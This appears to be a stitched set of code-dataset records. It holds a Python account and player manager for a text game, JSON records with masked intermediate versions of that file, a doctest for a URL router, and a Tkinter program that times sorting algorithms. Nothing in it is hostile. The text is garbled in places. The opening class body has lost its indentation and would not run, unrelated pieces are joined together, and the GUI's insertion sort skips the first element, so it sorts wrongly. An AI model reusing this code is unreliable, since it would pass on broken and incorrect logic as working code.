    displays = DBOField({})  # client display preferences
    notifies = DBOField([])  # enabled notification channels

    @property
    def edit_dto(self):
        # Never leak the stored password hash to editor clients.
        dto = super().edit_dto
        dto['password'] = ''
        return dto

    @property
    def imm_level(self):
        # Highest immortal level among this account's players; 0 when the
        # account has no players (or none are immortal).
        if self.player_ids:
            return max([perm.immortals.get(player_id, 0) for player_id in self.player_ids])
        return 0
class UserManager():
def _post_init(self):
register("user_connect", self._user_connect)
register("player_connect", self._player_connect)
def validate_user(self, user_name, password):
user = self.find_user(user_name)
if not user:
raise ClientError()
self.validate_password(user, password)
return user
def validate_password(self, user, password):
if check_password(user.password, password):
return
salt, old_password = user.password.split('$')
if check_password(b64decode(bytes(old_password, 'utf-8')), password, bytes(salt, 'utf-8')):
warn("Using old password for account {}", user.user_name)
user.password_reset = True
save_object(user)
else:
raise ClientError("invalid_password")
def find_user(self, user_name):
user_name = user_name.lower()
user_id = get_index("ix:user:user_name", user_name)
if user_id:
return load_object(user_id, User)
player = load_object(user_name, Player)
if player:
return load_object(player.user_id, User)
return None
def delete_user(self, user):
for player_id in user.player_ids:
self._player_delete(player_id)
delete_object(user)
dispatch('publish_edit', 'delete', user)
def delete_player(self, user, player_id):
if user:
self._player_delete(player_id)
user.player_ids.remove(player_id)
save_object(user)
def attach_player(self, user, player):
user.player_ids.append(player.dbo_id)
set_index('ix:player:user', player.dbo_id, user.dbo_id)
dispatch('player_create', player, user)
player.user_id = user.dbo_id
save_object(player)
save_object(user)
return player
def find_player(self, player_id):
return load_object(player_id, Player)
def create_user(self, user_name, password, email=""):
user_raw = {'dbo_id': db_counter('user_id'), 'user_name': user_name,
'email': email, 'password': make_hash(password),
'notifies': ['friendSound', 'friendDesktop']}
user = create_object(User, user_raw)
dispatch('publish_edit', 'create', user)
return user
def check_name(self, account_name, user):
account_name = account_name.lower()
if user:
if account_name == user.user_name.lower():
return
for player_id in user.player_ids:
if account_name == player_id.lower():
return
if self.player_exists(account_name) or get_index("ix:user:user_name", account_name):
raise DataError("InUse: {}".format(account_name))
def player_exists(self, player_id):
return object_exists(Player.dbo_key_type, player_id)
def _user_connect(self, user, client_data):
client_data.update({'user_id': user.dbo_id, 'player_ids': user.player_ids, 'displays': user.displays,
'password_reset': user.password_reset, 'notifies': user.notifies})
def _player_connect(self, player, client_data):
client_data['name'] = player.name
if player.imm_level:
client_data['imm_level'] = player.imm_level
def login_player(self, player):
dispatch('player_baptise', player)
player.last_login = int(time.time())
if not player.created:
player.created = player.last_login
player.start()
def logout_player(self, player):
player.age += player.last_logout - player.last_login
player.detach()
save_object(player)
evict_object(player)
def id_to_name(self, player_id):
try:
return player_id.capitalize()
except AttributeError:
pass
def name_to_id(self, player_name):
return player_name.lower()
def player_cleanup(self, player_id):
delete_index('ix:player:user', player_id)
for dbo_id in fetch_set_keys('owned:{}'.format(player_id)):
dbo = load_object(dbo_id)
if dbo and dbo.owner_id == player_id:
dbo.change_owner()
save_object(dbo)
dispatch('publish_update', 'update', dbo)
dispatch('player_deleted', player_id)
def _player_delete(self, player_id):
    """Delete the stored player (if any); cleanup always runs regardless."""
    player = load_object(player_id, Player)
    if not player:
        warn("Attempting to delete player {} who does not exist.".format(player_id))
    else:
        dispatch('publish_edit', 'delete', player)
        delete_object(player)
    self.player_cleanup(player_id)
|
normal
|
{
"blob_id": "210199ed217db0d7a05e280f20e33496c0795f06",
"index": 9472,
"step-1": "<mask token>\n\n\nclass UserManager:\n <mask token>\n\n def validate_user(self, user_name, password):\n user = self.find_user(user_name)\n if not user:\n raise ClientError()\n self.validate_password(user, password)\n return user\n <mask token>\n <mask token>\n\n def delete_user(self, user):\n for player_id in user.player_ids:\n self._player_delete(player_id)\n delete_object(user)\n dispatch('publish_edit', 'delete', user)\n\n def delete_player(self, user, player_id):\n if user:\n self._player_delete(player_id)\n user.player_ids.remove(player_id)\n save_object(user)\n <mask token>\n <mask token>\n\n def create_user(self, user_name, password, email=''):\n user_raw = {'dbo_id': db_counter('user_id'), 'user_name': user_name,\n 'email': email, 'password': make_hash(password), 'notifies': [\n 'friendSound', 'friendDesktop']}\n user = create_object(User, user_raw)\n dispatch('publish_edit', 'create', user)\n return user\n <mask token>\n\n def player_exists(self, player_id):\n return object_exists(Player.dbo_key_type, player_id)\n\n def _user_connect(self, user, client_data):\n client_data.update({'user_id': user.dbo_id, 'player_ids': user.\n player_ids, 'displays': user.displays, 'password_reset': user.\n password_reset, 'notifies': user.notifies})\n <mask token>\n\n def login_player(self, player):\n dispatch('player_baptise', player)\n player.last_login = int(time.time())\n if not player.created:\n player.created = player.last_login\n player.start()\n <mask token>\n <mask token>\n\n def name_to_id(self, player_name):\n return player_name.lower()\n\n def player_cleanup(self, player_id):\n delete_index('ix:player:user', player_id)\n for dbo_id in fetch_set_keys('owned:{}'.format(player_id)):\n dbo = load_object(dbo_id)\n if dbo and dbo.owner_id == player_id:\n dbo.change_owner()\n save_object(dbo)\n dispatch('publish_update', 'update', dbo)\n dispatch('player_deleted', player_id)\n\n def _player_delete(self, player_id):\n player = load_object(player_id, 
Player)\n if player:\n dispatch('publish_edit', 'delete', player)\n delete_object(player)\n else:\n warn('Attempting to delete player {} who does not exist.'.\n format(player_id))\n self.player_cleanup(player_id)\n",
"step-2": "<mask token>\n\n\nclass UserManager:\n <mask token>\n\n def validate_user(self, user_name, password):\n user = self.find_user(user_name)\n if not user:\n raise ClientError()\n self.validate_password(user, password)\n return user\n <mask token>\n\n def find_user(self, user_name):\n user_name = user_name.lower()\n user_id = get_index('ix:user:user_name', user_name)\n if user_id:\n return load_object(user_id, User)\n player = load_object(user_name, Player)\n if player:\n return load_object(player.user_id, User)\n return None\n\n def delete_user(self, user):\n for player_id in user.player_ids:\n self._player_delete(player_id)\n delete_object(user)\n dispatch('publish_edit', 'delete', user)\n\n def delete_player(self, user, player_id):\n if user:\n self._player_delete(player_id)\n user.player_ids.remove(player_id)\n save_object(user)\n\n def attach_player(self, user, player):\n user.player_ids.append(player.dbo_id)\n set_index('ix:player:user', player.dbo_id, user.dbo_id)\n dispatch('player_create', player, user)\n player.user_id = user.dbo_id\n save_object(player)\n save_object(user)\n return player\n\n def find_player(self, player_id):\n return load_object(player_id, Player)\n\n def create_user(self, user_name, password, email=''):\n user_raw = {'dbo_id': db_counter('user_id'), 'user_name': user_name,\n 'email': email, 'password': make_hash(password), 'notifies': [\n 'friendSound', 'friendDesktop']}\n user = create_object(User, user_raw)\n dispatch('publish_edit', 'create', user)\n return user\n\n def check_name(self, account_name, user):\n account_name = account_name.lower()\n if user:\n if account_name == user.user_name.lower():\n return\n for player_id in user.player_ids:\n if account_name == player_id.lower():\n return\n if self.player_exists(account_name) or get_index('ix:user:user_name',\n account_name):\n raise DataError('InUse: {}'.format(account_name))\n\n def player_exists(self, player_id):\n return object_exists(Player.dbo_key_type, 
player_id)\n\n def _user_connect(self, user, client_data):\n client_data.update({'user_id': user.dbo_id, 'player_ids': user.\n player_ids, 'displays': user.displays, 'password_reset': user.\n password_reset, 'notifies': user.notifies})\n <mask token>\n\n def login_player(self, player):\n dispatch('player_baptise', player)\n player.last_login = int(time.time())\n if not player.created:\n player.created = player.last_login\n player.start()\n\n def logout_player(self, player):\n player.age += player.last_logout - player.last_login\n player.detach()\n save_object(player)\n evict_object(player)\n\n def id_to_name(self, player_id):\n try:\n return player_id.capitalize()\n except AttributeError:\n pass\n\n def name_to_id(self, player_name):\n return player_name.lower()\n\n def player_cleanup(self, player_id):\n delete_index('ix:player:user', player_id)\n for dbo_id in fetch_set_keys('owned:{}'.format(player_id)):\n dbo = load_object(dbo_id)\n if dbo and dbo.owner_id == player_id:\n dbo.change_owner()\n save_object(dbo)\n dispatch('publish_update', 'update', dbo)\n dispatch('player_deleted', player_id)\n\n def _player_delete(self, player_id):\n player = load_object(player_id, Player)\n if player:\n dispatch('publish_edit', 'delete', player)\n delete_object(player)\n else:\n warn('Attempting to delete player {} who does not exist.'.\n format(player_id))\n self.player_cleanup(player_id)\n",
"step-3": "<mask token>\n\n\nclass UserManager:\n\n def _post_init(self):\n register('user_connect', self._user_connect)\n register('player_connect', self._player_connect)\n\n def validate_user(self, user_name, password):\n user = self.find_user(user_name)\n if not user:\n raise ClientError()\n self.validate_password(user, password)\n return user\n\n def validate_password(self, user, password):\n if check_password(user.password, password):\n return\n salt, old_password = user.password.split('$')\n if check_password(b64decode(bytes(old_password, 'utf-8')), password,\n bytes(salt, 'utf-8')):\n warn('Using old password for account {}', user.user_name)\n user.password_reset = True\n save_object(user)\n else:\n raise ClientError('invalid_password')\n\n def find_user(self, user_name):\n user_name = user_name.lower()\n user_id = get_index('ix:user:user_name', user_name)\n if user_id:\n return load_object(user_id, User)\n player = load_object(user_name, Player)\n if player:\n return load_object(player.user_id, User)\n return None\n\n def delete_user(self, user):\n for player_id in user.player_ids:\n self._player_delete(player_id)\n delete_object(user)\n dispatch('publish_edit', 'delete', user)\n\n def delete_player(self, user, player_id):\n if user:\n self._player_delete(player_id)\n user.player_ids.remove(player_id)\n save_object(user)\n\n def attach_player(self, user, player):\n user.player_ids.append(player.dbo_id)\n set_index('ix:player:user', player.dbo_id, user.dbo_id)\n dispatch('player_create', player, user)\n player.user_id = user.dbo_id\n save_object(player)\n save_object(user)\n return player\n\n def find_player(self, player_id):\n return load_object(player_id, Player)\n\n def create_user(self, user_name, password, email=''):\n user_raw = {'dbo_id': db_counter('user_id'), 'user_name': user_name,\n 'email': email, 'password': make_hash(password), 'notifies': [\n 'friendSound', 'friendDesktop']}\n user = create_object(User, user_raw)\n dispatch('publish_edit', 
'create', user)\n return user\n\n def check_name(self, account_name, user):\n account_name = account_name.lower()\n if user:\n if account_name == user.user_name.lower():\n return\n for player_id in user.player_ids:\n if account_name == player_id.lower():\n return\n if self.player_exists(account_name) or get_index('ix:user:user_name',\n account_name):\n raise DataError('InUse: {}'.format(account_name))\n\n def player_exists(self, player_id):\n return object_exists(Player.dbo_key_type, player_id)\n\n def _user_connect(self, user, client_data):\n client_data.update({'user_id': user.dbo_id, 'player_ids': user.\n player_ids, 'displays': user.displays, 'password_reset': user.\n password_reset, 'notifies': user.notifies})\n <mask token>\n\n def login_player(self, player):\n dispatch('player_baptise', player)\n player.last_login = int(time.time())\n if not player.created:\n player.created = player.last_login\n player.start()\n\n def logout_player(self, player):\n player.age += player.last_logout - player.last_login\n player.detach()\n save_object(player)\n evict_object(player)\n\n def id_to_name(self, player_id):\n try:\n return player_id.capitalize()\n except AttributeError:\n pass\n\n def name_to_id(self, player_name):\n return player_name.lower()\n\n def player_cleanup(self, player_id):\n delete_index('ix:player:user', player_id)\n for dbo_id in fetch_set_keys('owned:{}'.format(player_id)):\n dbo = load_object(dbo_id)\n if dbo and dbo.owner_id == player_id:\n dbo.change_owner()\n save_object(dbo)\n dispatch('publish_update', 'update', dbo)\n dispatch('player_deleted', player_id)\n\n def _player_delete(self, player_id):\n player = load_object(player_id, Player)\n if player:\n dispatch('publish_edit', 'delete', player)\n delete_object(player)\n else:\n warn('Attempting to delete player {} who does not exist.'.\n format(player_id))\n self.player_cleanup(player_id)\n",
"step-4": "<mask token>\n\n\nclass User(KeyDBO):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass UserManager:\n\n def _post_init(self):\n register('user_connect', self._user_connect)\n register('player_connect', self._player_connect)\n\n def validate_user(self, user_name, password):\n user = self.find_user(user_name)\n if not user:\n raise ClientError()\n self.validate_password(user, password)\n return user\n\n def validate_password(self, user, password):\n if check_password(user.password, password):\n return\n salt, old_password = user.password.split('$')\n if check_password(b64decode(bytes(old_password, 'utf-8')), password,\n bytes(salt, 'utf-8')):\n warn('Using old password for account {}', user.user_name)\n user.password_reset = True\n save_object(user)\n else:\n raise ClientError('invalid_password')\n\n def find_user(self, user_name):\n user_name = user_name.lower()\n user_id = get_index('ix:user:user_name', user_name)\n if user_id:\n return load_object(user_id, User)\n player = load_object(user_name, Player)\n if player:\n return load_object(player.user_id, User)\n return None\n\n def delete_user(self, user):\n for player_id in user.player_ids:\n self._player_delete(player_id)\n delete_object(user)\n dispatch('publish_edit', 'delete', user)\n\n def delete_player(self, user, player_id):\n if user:\n self._player_delete(player_id)\n user.player_ids.remove(player_id)\n save_object(user)\n\n def attach_player(self, user, player):\n user.player_ids.append(player.dbo_id)\n set_index('ix:player:user', player.dbo_id, user.dbo_id)\n dispatch('player_create', player, user)\n player.user_id = user.dbo_id\n save_object(player)\n save_object(user)\n return player\n\n def find_player(self, player_id):\n return load_object(player_id, Player)\n\n def create_user(self, user_name, password, email=''):\n user_raw = 
{'dbo_id': db_counter('user_id'), 'user_name': user_name,\n 'email': email, 'password': make_hash(password), 'notifies': [\n 'friendSound', 'friendDesktop']}\n user = create_object(User, user_raw)\n dispatch('publish_edit', 'create', user)\n return user\n\n def check_name(self, account_name, user):\n account_name = account_name.lower()\n if user:\n if account_name == user.user_name.lower():\n return\n for player_id in user.player_ids:\n if account_name == player_id.lower():\n return\n if self.player_exists(account_name) or get_index('ix:user:user_name',\n account_name):\n raise DataError('InUse: {}'.format(account_name))\n\n def player_exists(self, player_id):\n return object_exists(Player.dbo_key_type, player_id)\n\n def _user_connect(self, user, client_data):\n client_data.update({'user_id': user.dbo_id, 'player_ids': user.\n player_ids, 'displays': user.displays, 'password_reset': user.\n password_reset, 'notifies': user.notifies})\n\n def _player_connect(self, player, client_data):\n client_data['name'] = player.name\n if player.imm_level:\n client_data['imm_level'] = player.imm_level\n\n def login_player(self, player):\n dispatch('player_baptise', player)\n player.last_login = int(time.time())\n if not player.created:\n player.created = player.last_login\n player.start()\n\n def logout_player(self, player):\n player.age += player.last_logout - player.last_login\n player.detach()\n save_object(player)\n evict_object(player)\n\n def id_to_name(self, player_id):\n try:\n return player_id.capitalize()\n except AttributeError:\n pass\n\n def name_to_id(self, player_name):\n return player_name.lower()\n\n def player_cleanup(self, player_id):\n delete_index('ix:player:user', player_id)\n for dbo_id in fetch_set_keys('owned:{}'.format(player_id)):\n dbo = load_object(dbo_id)\n if dbo and dbo.owner_id == player_id:\n dbo.change_owner()\n save_object(dbo)\n dispatch('publish_update', 'update', dbo)\n dispatch('player_deleted', player_id)\n\n def _player_delete(self, 
player_id):\n player = load_object(player_id, Player)\n if player:\n dispatch('publish_edit', 'delete', player)\n delete_object(player)\n else:\n warn('Attempting to delete player {} who does not exist.'.\n format(player_id))\n self.player_cleanup(player_id)\n",
"step-5": "from base64 import b64decode\nimport time\n\nfrom lampost.context.resource import m_requires\nfrom lampost.datastore.dbo import KeyDBO\nfrom lampost.datastore.dbofield import DBOField\nfrom lampost.datastore.exceptions import DataError\nfrom lampost.model.player import Player\nfrom lampost.util.encrypt import make_hash, check_password\nfrom lampost.util.lputil import ClientError\n\n\nm_requires(__name__, 'log', 'perm', 'datastore', 'dispatcher')\n\n\nclass User(KeyDBO):\n dbo_key_type = \"user\"\n dbo_set_key = \"users\"\n dbo_indexes = \"user_name\", \"email\"\n\n user_name = DBOField('')\n password = DBOField()\n password_reset = DBOField(False)\n email = DBOField('')\n notes = DBOField('')\n\n player_ids = DBOField([])\n displays = DBOField({})\n notifies = DBOField([])\n\n @property\n def edit_dto(self):\n dto = super().edit_dto\n dto['password'] = ''\n return dto\n\n @property\n def imm_level(self):\n if self.player_ids:\n return max([perm.immortals.get(player_id, 0) for player_id in self.player_ids])\n return 0\n\n\nclass UserManager():\n def _post_init(self):\n register(\"user_connect\", self._user_connect)\n register(\"player_connect\", self._player_connect)\n\n def validate_user(self, user_name, password):\n user = self.find_user(user_name)\n if not user:\n raise ClientError()\n self.validate_password(user, password)\n return user\n\n def validate_password(self, user, password):\n if check_password(user.password, password):\n return\n salt, old_password = user.password.split('$')\n if check_password(b64decode(bytes(old_password, 'utf-8')), password, bytes(salt, 'utf-8')):\n warn(\"Using old password for account {}\", user.user_name)\n user.password_reset = True\n save_object(user)\n else:\n raise ClientError(\"invalid_password\")\n\n def find_user(self, user_name):\n user_name = user_name.lower()\n user_id = get_index(\"ix:user:user_name\", user_name)\n if user_id:\n return load_object(user_id, User)\n player = load_object(user_name, Player)\n 
if player:\n return load_object(player.user_id, User)\n return None\n\n def delete_user(self, user):\n for player_id in user.player_ids:\n self._player_delete(player_id)\n delete_object(user)\n dispatch('publish_edit', 'delete', user)\n\n def delete_player(self, user, player_id):\n if user:\n self._player_delete(player_id)\n user.player_ids.remove(player_id)\n save_object(user)\n\n def attach_player(self, user, player):\n\n user.player_ids.append(player.dbo_id)\n set_index('ix:player:user', player.dbo_id, user.dbo_id)\n dispatch('player_create', player, user)\n player.user_id = user.dbo_id\n save_object(player)\n save_object(user)\n return player\n\n def find_player(self, player_id):\n return load_object(player_id, Player)\n\n def create_user(self, user_name, password, email=\"\"):\n user_raw = {'dbo_id': db_counter('user_id'), 'user_name': user_name,\n 'email': email, 'password': make_hash(password),\n 'notifies': ['friendSound', 'friendDesktop']}\n user = create_object(User, user_raw)\n dispatch('publish_edit', 'create', user)\n return user\n\n def check_name(self, account_name, user):\n account_name = account_name.lower()\n if user:\n if account_name == user.user_name.lower():\n return\n for player_id in user.player_ids:\n if account_name == player_id.lower():\n return\n if self.player_exists(account_name) or get_index(\"ix:user:user_name\", account_name):\n raise DataError(\"InUse: {}\".format(account_name))\n\n def player_exists(self, player_id):\n return object_exists(Player.dbo_key_type, player_id)\n\n def _user_connect(self, user, client_data):\n client_data.update({'user_id': user.dbo_id, 'player_ids': user.player_ids, 'displays': user.displays,\n 'password_reset': user.password_reset, 'notifies': user.notifies})\n\n def _player_connect(self, player, client_data):\n client_data['name'] = player.name\n if player.imm_level:\n client_data['imm_level'] = player.imm_level\n\n def login_player(self, player):\n dispatch('player_baptise', player)\n 
player.last_login = int(time.time())\n if not player.created:\n player.created = player.last_login\n player.start()\n\n def logout_player(self, player):\n player.age += player.last_logout - player.last_login\n player.detach()\n save_object(player)\n evict_object(player)\n\n def id_to_name(self, player_id):\n try:\n return player_id.capitalize()\n except AttributeError:\n pass\n\n def name_to_id(self, player_name):\n return player_name.lower()\n\n def player_cleanup(self, player_id):\n delete_index('ix:player:user', player_id)\n for dbo_id in fetch_set_keys('owned:{}'.format(player_id)):\n dbo = load_object(dbo_id)\n if dbo and dbo.owner_id == player_id:\n dbo.change_owner()\n save_object(dbo)\n dispatch('publish_update', 'update', dbo)\n dispatch('player_deleted', player_id)\n\n def _player_delete(self, player_id):\n player = load_object(player_id, Player)\n if player:\n dispatch('publish_edit', 'delete', player)\n delete_object(player)\n else:\n warn(\"Attempting to delete player {} who does not exist.\".format(player_id))\n self.player_cleanup(player_id)\n\n",
"step-ids": [
11,
17,
19,
21,
27
]
}
|
[
11,
17,
19,
21,
27
] |
r""" 测试dispatch
>>> from url_router.map import Map
>>> from url_router.rule import Rule
>>> m = Map([
... Rule('/', endpoint='index'),
... Rule('/foo', endpoint='foo'),
... Rule('/bar/', endpoint='bar'),
... Rule('/any/<name>', endpoint='any'),
... Rule('/string/<string:name>', endpoint='string'),
... Rule('/integer/<int:name>', endpoint='integer'),
... Rule('/float/<float:name>', endpoint='float')
... ])
>>> adapter = m.bind('example.org', '/')
>>> def view_func(endpoint, args):
... print(f'endpoint:{endpoint}\nargs:{args}')
... return str(endpoint)
...
>>> adapter.dispatch(view_func, '/')
endpoint:index
args:{}
'index'
>>> adapter.dispatch(view_func, '/any/value')
endpoint:any
args:{'name': 'value'}
'any'
>>> adapter.dispatch(view_func, '/missing')
Traceback (most recent call last):
...
url_router.exceptions.NotFound
"""
if __name__ == "__main__":
    # Running this module directly executes the doctest examples embedded
    # in its module docstring.
    import doctest
    doctest.testmod()
|
normal
|
{
"blob_id": "3cca7408eb88f91f295c581c29d3d1e95298f337",
"index": 6445,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n",
"step-3": "r\"\"\" 测试dispatch\n\n>>> from url_router.map import Map\n>>> from url_router.rule import Rule\n>>> m = Map([\n... Rule('/', endpoint='index'),\n... Rule('/foo', endpoint='foo'),\n... Rule('/bar/', endpoint='bar'),\n... Rule('/any/<name>', endpoint='any'),\n... Rule('/string/<string:name>', endpoint='string'),\n... Rule('/integer/<int:name>', endpoint='integer'),\n... Rule('/float/<float:name>', endpoint='float')\n... ])\n>>> adapter = m.bind('example.org', '/')\n\n>>> def view_func(endpoint, args):\n... print(f'endpoint:{endpoint}\\nargs:{args}')\n... return str(endpoint)\n...\n\n\n>>> adapter.dispatch(view_func, '/')\nendpoint:index\nargs:{}\n'index'\n\n>>> adapter.dispatch(view_func, '/any/value')\nendpoint:any\nargs:{'name': 'value'}\n'any'\n\n>>> adapter.dispatch(view_func, '/missing')\nTraceback (most recent call last):\n ...\nurl_router.exceptions.NotFound\n\"\"\"\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from tkinter import *
import tkinter as tk
from tkinter import ttk
from tkinter import messagebox
import random
import numpy as np
import timeit
def main():
    """Build and run the sorting-simulation GUI (Tkinter).

    Lets the user generate a list of random integers, run one of four
    in-place sorting routines on it, and compare the displayed results
    and measured run times.
    """
    root = tk.Tk()
    # root.geometry('800x500')
    root.resizable(width=False, height=False)
    root.title('Tugas Algoritma')

    canvas = tk.Canvas(root, height=500, width=800)
    canvas.pack()

    # Background image; the Label keeps a reference so the PhotoImage is
    # not garbage collected while the window lives.
    bg = tk.PhotoImage(file='bg.png')
    bl = tk.Label(root, image=bg)
    bl.place(relwidth=1, relheight=1)

    ########################################################################

    def about():
        messagebox.showinfo("About", "Simulasi Algoritma Sorting")

    def help_box(event=None):
        messagebox.showinfo(
            "Help", "For help email to hai@irfnrdh.com", icon='question')

    def exit_editor():
        if messagebox.askokcancel("Quti", "Do you really want to quit?"):
            root.destroy()
    root.protocol('WM_DELETE_WINDOW', exit_editor)

    def donothing():
        print("Nothing to do :v")

    ########################################################################
    # Bubble sort: bubble the largest remaining value to the end (in place).
    def bbsort(angka):
        for i in range(len(angka) - 1, 0, -1):
            for j in range(i):
                if angka[j] > angka[j + 1]:
                    angka[j], angka[j + 1] = angka[j + 1], angka[j]

    # Selection sort: select the minimum of the unsorted tail (in place).
    def sssort(angka):
        for i in range(len(angka)):
            min_idx = i
            for j in range(i, len(angka)):
                if angka[j] < angka[min_idx]:
                    min_idx = j
            angka[i], angka[min_idx] = angka[min_idx], angka[i]

    # Insertion sort (in place).
    # BUG FIX: the previous version looped `for j in range(i-1, 0, -1)`,
    # which never examined index 0 and dropped the element being inserted
    # when it belonged at the front (e.g. [2, 1] stayed unsorted).
    def issort(angka):
        for i in range(1, len(angka)):
            key = angka[i]
            j = i - 1
            while j >= 0 and angka[j] > key:
                angka[j + 1] = angka[j]
                j -= 1
            angka[j + 1] = key

    # "Bubble+Insertion+Selection optimized" sort.
    # NOTE(review): despite the name this is identical to selection sort
    # above -- confirm whether a genuinely different algorithm was intended.
    def bisort(angka):
        for i in range(len(angka)):
            min_idx = i
            for j in range(i, len(angka)):
                if angka[j] < angka[min_idx]:
                    min_idx = j
            angka[i], angka[min_idx] = angka[min_idx], angka[i]

    ########################################################################
    def run_sort(sort_fn, title, time_label, x, y):
        """Shared button handler: copy the sample data, sort it with
        *sort_fn*, fill the result listbox, and show the elapsed time
        in *time_label* placed at (x, y)."""
        if len(listbox_widget.get(0, tk.END)) == 0:
            print("Data Lu mane?")
            return
        print("#################################################### " + title)
        hasil_listbox_widget.delete(0, tk.END)
        # NOTE(review): Listbox.get may hand the values back as strings,
        # making the comparisons lexicographic -- confirm intended.
        angka = list(listbox_widget.get(0, tk.END))
        print("Data Sample \n", angka)
        start = timeit.default_timer()
        sort_fn(angka)
        stop = timeit.default_timer()
        runtime = stop - start
        print("\n Hasil Sorting \n", angka)
        print('RunTime : ', runtime)
        print('Jumlah data : ', len(angka))
        for hasil_entry in angka:
            hasil_listbox_widget.insert(tk.END, hasil_entry)
        time_label.config(text="% .12f" % runtime)
        time_label.place(x=x, y=y)

    def bbs_respon():
        run_sort(bbsort, "BUBLE SORT ", bbs_time, 420, 185)

    def iss_respon():
        run_sort(issort, "INSERTION SORT ", iss_time, 545, 185)

    def sss_respon():
        run_sort(sssort, "SELECTION SORT ", sss_time, 670, 185)

    def bsi_respon():
        run_sort(bisort, "BSI", bsi_time, 570, 333)

    def generate(entry):
        """Fill the sample listbox with int(entry) random ints in [1, 1000]."""
        listbox_widget.delete(0, tk.END)
        for _ in range(int(entry)):
            listbox_widget.insert(tk.END, random.randint(1, 1000))

    def cls():
        """Clear the result listbox and scroll old console output away."""
        hasil_listbox_widget.delete(0, tk.END)
        print("\n" * 100)

    ########################################################################
    menubar = Menu(root)
    filemenu = Menu(menubar, tearoff=0)
    filemenu.add_command(label="Generate Random Number", command=donothing)
    filemenu.add_command(label="Close", command=exit_editor)
    filemenu.add_separator()
    filemenu.add_command(label="Exit", command=root.quit)
    menubar.add_cascade(label="File", menu=filemenu)

    aboutmenu = Menu(menubar, tearoff=0)
    menubar.add_cascade(label="About", menu=aboutmenu)
    aboutmenu.add_command(label="About", command=about)
    aboutmenu.add_command(label="Help", command=help_box)
    root.config(menu=menubar)

    ########################################################################
    # DATA SAMPLING ------------------------------
    frame_data = tk.Frame(root)
    frame_data.place(relx=0.128, rely=0.140, relwidth=0.18,
                     relheight=0.65, anchor='n')
    listbox_widget = tk.Listbox(
        frame_data, selectmode="BROWSE", height=20, width=20, background='white')
    listbox_widget_scrl = Scrollbar(frame_data, orient=VERTICAL)
    listbox_widget.config(yscrollcommand=listbox_widget_scrl.set)
    listbox_widget_scrl.configure(command=listbox_widget.yview)
    listbox_widget.grid(row=1, sticky=W)
    listbox_widget_scrl.grid(row=1, column=1, sticky=NS)

    # DATA HASIL ------------------------------
    frame_hasil = tk.Frame(root)
    frame_hasil.place(relx=0.34, rely=0.140, relwidth=0.18,
                      relheight=0.65, anchor='n')
    hasil_listbox_widget = tk.Listbox(
        frame_hasil, selectmode="BROWSE", height=20, width=20, background='white')
    hasil_listbox_widget_scrl = Scrollbar(frame_hasil, orient=VERTICAL)
    hasil_listbox_widget.config(yscrollcommand=hasil_listbox_widget_scrl.set)
    hasil_listbox_widget_scrl.configure(command=hasil_listbox_widget.yview)
    hasil_listbox_widget.grid(row=1, sticky=W)
    hasil_listbox_widget_scrl.grid(row=1, column=1, sticky=NS)

    # Entry for the sample size.
    entry = tk.Entry(root, font=40, width=7)
    entry.place(x=105, y=450)

    # START buttons, one per algorithm.
    bbs_button = tk.Button(root, text="START", font=40,
                           command=bbs_respon).place(x=434, y=140)
    iss_button = tk.Button(root, text="START", font=40,
                           command=iss_respon).place(x=555, y=140)
    sss_button = tk.Button(root, text="START", font=40,
                           command=sss_respon).place(x=680, y=140)
    bsi_button = tk.Button(root, text="START", font=40,
                           command=bsi_respon).place(x=466, y=330)

    # GENERATE / CLEAN controls.
    gen_button = tk.Button(root, text="GENERATE", font=40,
                           command=lambda: generate(entry.get()))
    gen_button.place(x=180, y=447)
    cls_button = tk.Button(root, text="CLEAN", font=40,
                           command=cls).place(x=295, y=447)

    # Per-algorithm run-time labels.
    bbs_time = ttk.Label(root, background="#6367c8",
                         foreground="#fff")
    bbs_time['text'] = "Respon Time"
    bbs_time.place(x=429, y=185)

    iss_time = tk.Label(root,
                        background="#6367c8", foreground="#fff")
    iss_time['text'] = "Respon Time"
    iss_time.place(x=555, y=185)

    sss_time = tk.Label(root,
                        background="#6367c8", foreground="#fff")
    sss_time['text'] = "Respon Time"
    sss_time.place(x=680, y=185)

    bsi_time = tk.Label(root,
                        background="#6367c8", font=40, foreground="#fff")
    bsi_time['text'] = "Respon Time"
    bsi_time.place(x=570, y=333)

    ########################################################################
    root.mainloop()
main()
|
normal
|
{
"blob_id": "8a9feae4ce209def2c98b7bed993f9b5c019a533",
"index": 7480,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n root = tk.Tk()\n root.resizable(width=False, height=False)\n root.title('Tugas Algoritma')\n canvas = tk.Canvas(root, height=500, width=800)\n canvas.pack()\n bg = tk.PhotoImage(file='bg.png')\n bl = tk.Label(root, image=bg)\n bl.place(relwidth=1, relheight=1)\n\n def about():\n messagebox.showinfo('About', 'Simulasi Algoritma Sorting')\n\n def help_box(event=None):\n messagebox.showinfo('Help', 'For help email to hai@irfnrdh.com',\n icon='question')\n\n def exit_editor():\n if messagebox.askokcancel('Quti', 'Do you really want to quit?'):\n root.destroy()\n root.protocol('WM_DELETE_WINDOW', exit_editor)\n\n def donothing():\n print('Nothing to do :v')\n\n def bbsort(angka):\n for i in range(len(angka) - 1, 0, -1):\n for j in range(i):\n if angka[j] > angka[j + 1]:\n tampung = angka[j]\n angka[j] = angka[j + 1]\n angka[j + 1] = tampung\n\n def sssort(angka):\n for i in range(len(angka)):\n min_idx = i\n for j in range(i, len(angka)):\n if angka[j] < angka[min_idx]:\n min_idx = j\n tampung = angka[i]\n angka[i] = angka[min_idx]\n angka[min_idx] = tampung\n\n def issort(angka):\n for i in range(1, len(angka)):\n idx = angka[i]\n for j in range(i - 1, 0, -1):\n if angka[j] > idx:\n angka[j + 1] = angka[j]\n else:\n angka[j + 1] = idx\n break\n\n def bisort(angka):\n for i in range(len(angka)):\n min_idx = i\n for j in range(i, len(angka)):\n if angka[j] < angka[min_idx]:\n min_idx = j\n tampung = angka[i]\n angka[i] = angka[min_idx]\n angka[min_idx] = tampung\n\n def bbs_respon():\n if len(listbox_widget.get(0, tk.END)) == 0:\n print('Data Lu mane?')\n else:\n print(\n '#################################################### BUBLE SORT 